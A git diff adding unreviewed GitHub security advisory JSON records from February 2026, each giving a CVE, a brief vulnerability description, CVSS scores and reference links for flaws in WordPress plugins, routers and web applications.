b/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json new file mode 100644 index 0000000000000..bcebc42dd1ebc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fh-vjwm-p6c4", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25431" + ], + "details": "delpino73 Blue-Smiley-Organizer 1.32 contains an SQL injection vulnerability in the datetime parameter that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL code through POST requests to extract sensitive data using boolean-based blind and time-based blind techniques, or write files to the server using INTO OUTFILE statements.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25431" + }, + { + "type": "WEB", + "url": "https://github.com/delpino73/Blue-Smiley-Organizer" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47550" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/delpino-blue-smiley-organizer-sql-injection-via-datetime" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9rp-vxw4-rq3m/GHSA-w9rp-vxw4-rq3m.json b/advisories/unreviewed/2026/02/GHSA-w9rp-vxw4-rq3m/GHSA-w9rp-vxw4-rq3m.json new file mode 100644 index 0000000000000..d610a50853e48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9rp-vxw4-rq3m/GHSA-w9rp-vxw4-rq3m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9rp-vxw4-rq3m", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27066" + ], + "details": "Missing Authorization vulnerability in PI Web Solution Live sales notification for WooCommerce live-sales-notifications-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Live sales notification for WooCommerce: from n/a through <= 2.3.46.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27066" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/live-sales-notifications-for-woocommerce/vulnerability/wordpress-live-sales-notification-for-woocommerce-plugin-2-3-44-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json b/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json new file mode 100644 index 0000000000000..b67e9ddb08d8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc6r-7g4j-c7x4", + "modified": "2026-02-20T15:31:03Z", + "published": "2026-02-20T15:31:03Z", + "aliases": [ + "CVE-2026-21627" + ], + "details": "The vulnerability was rooted in how the Tassos Framework plugin handled specific AJAX requests through Joomla’s com_ajax entry point. Under certain conditions, internal framework functionality could be invoked without proper restriction.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21627" + }, + { + "type": "WEB", + "url": "https://tassos.gr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T15:20:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wc8x-254r-w3mh/GHSA-wc8x-254r-w3mh.json b/advisories/unreviewed/2026/02/GHSA-wc8x-254r-w3mh/GHSA-wc8x-254r-w3mh.json new file mode 100644 index 0000000000000..af1798aa18715 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wc8x-254r-w3mh/GHSA-wc8x-254r-w3mh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc8x-254r-w3mh", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27052" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in villatheme Sales Countdown Timer for WooCommerce and WordPress sctv-sales-countdown-timer allows PHP Local File Inclusion.This issue affects Sales Countdown Timer for WooCommerce and WordPress: from n/a through <= 1.1.8.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27052" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/sctv-sales-countdown-timer/vulnerability/wordpress-sales-countdown-timer-for-woocommerce-and-wordpress-plugin-1-1-8-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json b/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json new file mode 100644 index 0000000000000..60ca50ad37bc5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf2x-4p8v-p7m6", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25456" + ], + "details": "Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'ara' GET parameter. Attackers can send requests to with time-based SQL injection payloads to extract sensitive database information or cause denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25456" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47141" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-emlak-sql-injection-via-ara-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/emlak-scripti-v2.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json new file mode 100644 index 0000000000000..b108256ae4364 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf36-8q2p-m2xg", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53231" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevstudio Easy Taxonomy Images easy-taxonomy-images allows Stored XSS.This issue affects Easy Taxonomy Images: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53231" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/easy-taxonomy-images/vulnerability/wordpress-easy-taxonomy-images-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf47-fvx4-6g8w/GHSA-wf47-fvx4-6g8w.json b/advisories/unreviewed/2026/02/GHSA-wf47-fvx4-6g8w/GHSA-wf47-fvx4-6g8w.json new file mode 100644 index 0000000000000..af8cc1e1c423a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf47-fvx4-6g8w/GHSA-wf47-fvx4-6g8w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf47-fvx4-6g8w", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25368" + ], + "details": "Missing Authorization vulnerability in codepeople Calculated Fields Form calculated-fields-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Calculated Fields Form: from n/a through <= 5.4.4.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/calculated-fields-form/vulnerability/wordpress-calculated-fields-form-plugin-5-4-4-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhf-6fj8-r5gx/GHSA-wfhf-6fj8-r5gx.json b/advisories/unreviewed/2026/02/GHSA-wfhf-6fj8-r5gx/GHSA-wfhf-6fj8-r5gx.json new file mode 100644 index 0000000000000..7b9bc1a8d8564 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfhf-6fj8-r5gx/GHSA-wfhf-6fj8-r5gx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhf-6fj8-r5gx", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-26358" + ], + "details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) a Missing Authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26358" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json b/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json new file mode 100644 index 0000000000000..9328aaa35b0ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfqx-2rhq-j78p", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68005" + ], + "details": "Missing Authorization vulnerability in themewant Easy Hotel Booking easy-hotel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Hotel Booking: from n/a through <= 1.8.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68005" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/easy-hotel/vulnerability/wordpress-easy-hotel-booking-plugin-1-8-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json b/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json new file mode 100644 index 0000000000000..7d5d118f2dbb2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfqx-gw86-rc8h", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68539" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Fana fana allows PHP Local File Inclusion.This issue affects Fana: from n/a through <= 1.1.35.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68539" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fana/vulnerability/wordpress-fana-theme-1-1-35-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json b/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json new file mode 100644 index 0000000000000..7ebc37ca853e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wg3c-3523-f9fc", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68855" + ], + "details": "Insertion of Sensitive Information Into Sent Data vulnerability in themeglow JobBoard Job listing job-board-light allows Retrieve Embedded Sensitive Data.This issue affects JobBoard Job listing: from n/a through <= 1.2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68855" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/job-board-light/vulnerability/wordpress-jobboard-job-listing-plugin-1-2-8-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-201" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json b/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json new file mode 100644 index 0000000000000..28de38c396cbe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgg5-6gv9-fvpp", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67977" + ], + "details": "Missing Authorization vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HAPPY: from n/a through <= 1.0.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67977" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wgvg-658f-w72v/GHSA-wgvg-658f-w72v.json b/advisories/unreviewed/2026/02/GHSA-wgvg-658f-w72v/GHSA-wgvg-658f-w72v.json new file mode 100644 index 0000000000000..f1d3cd2e12065 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wgvg-658f-w72v/GHSA-wgvg-658f-w72v.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgvg-658f-w72v", + "modified": "2026-02-17T15:31:35Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2026-2615" + ], + "details": "A flaw has been found in Wavlink WL-NU516U1 up to 20251208. The affected element is the function singlePortForwardDelete of the file /cgi-bin/firewall.cgi. Executing a manipulation of the argument del_flag can lead to command injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2615" + }, + { + "type": "WEB", + "url": "https://github.com/Wlz1112/Wavlink-NU516U1-V251208-/blob/main/singlePortForwardDelete.md" + }, + { + "type": "WEB", + "url": "https://github.com/Wlz1112/Wavlink-NU516U1-V251208-/blob/main/singlePortForwardDelete.md#exp" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346265" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346265" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751047" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T13:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json b/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json new file mode 100644 index 0000000000000..fdd3d10cd0fee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh45-rv58-w5rc", + "modified": "2026-02-22T12:30:26Z", + "published": "2026-02-22T12:30:26Z", + "aliases": [ + "CVE-2026-2944" + ], + "details": "A security flaw has been discovered in Tosei Online Store Management System ネット店舗管理システム 1.01. Affected is the function system of the file /cgi-bin/monitor.php of the component HTTP POST Request Handler. Performing a manipulation of the argument DevId results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2944" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunter-Leo/CVE/issues/9" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347314" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347314" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754579" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T11:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh7q-jq87-h3wq/GHSA-wh7q-jq87-h3wq.json b/advisories/unreviewed/2026/02/GHSA-wh7q-jq87-h3wq/GHSA-wh7q-jq87-h3wq.json new file mode 100644 index 0000000000000..4c86fc079fd7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh7q-jq87-h3wq/GHSA-wh7q-jq87-h3wq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh7q-jq87-h3wq", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25441" + ], + "details": "Missing Authorization vulnerability in LeadConnector LeadConnector leadconnector allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LeadConnector: from n/a through <= 3.0.21.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25441" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/leadconnector/vulnerability/wordpress-leadconnector-plugin-3-0-21-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json new file mode 100644 index 0000000000000..dbac3fa4b1378 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh7w-625p-7j85", + "modified": "2026-02-20T18:31:32Z", + "published": "2026-02-19T21:30:48Z", + "aliases": [ + "CVE-2026-27387" + ], + "details": "Missing Authorization vulnerability in designinvento DirectoryPress directorypress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DirectoryPress: from n/a through <= 3.6.26.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27387" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/directorypress/vulnerability/wordpress-directorypress-plugin-3-6-26-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T21:18:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json new file mode 100644 index 0000000000000..239db0c71b690 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whmh-gx62-v47m", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-59920" + ], + "details": "When hours are entered in time@work, version 7.0.5, it performs a query to display the projects assigned to the user. If the query URL is copied and opened in a new browser window, the ‘IDClient’ parameter is vulnerable to a blind authenticated SQL injection. If the request is made with the TWAdmin user with the sysadmin role enabled, exploiting the vulnerability will allow commands to be executed on the system; if the user does not belong to the sysadmin role, they will still be able to query data from the database.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59920" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-timework-systemswork" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json b/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json new file mode 100644 index 0000000000000..22dc6936280a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whp7-fpv9-q2pq/GHSA-whp7-fpv9-q2pq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whp7-fpv9-q2pq", + "modified": "2026-02-21T12:30:26Z", + "published": "2026-02-21T12:30:26Z", + "aliases": [ + "CVE-2025-14339" + ], + "details": "The weMail - Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation plugin for WordPress is vulnerable to unauthorized form deletion in all versions up to, and including, 2.0.7. This is due to the `Forms::permission()` callback only validating the `X-WP-Nonce` header without checking user capabilities. Since the REST nonce is exposed to unauthenticated visitors via the `weMail` JavaScript object on pages with weMail forms, any unauthenticated user can permanently delete all weMail forms by extracting the nonce from the page source and sending a DELETE request to the forms endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14339" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/FrontEnd/Scripts.php#L32" + }, + { + "type": "WEB", + 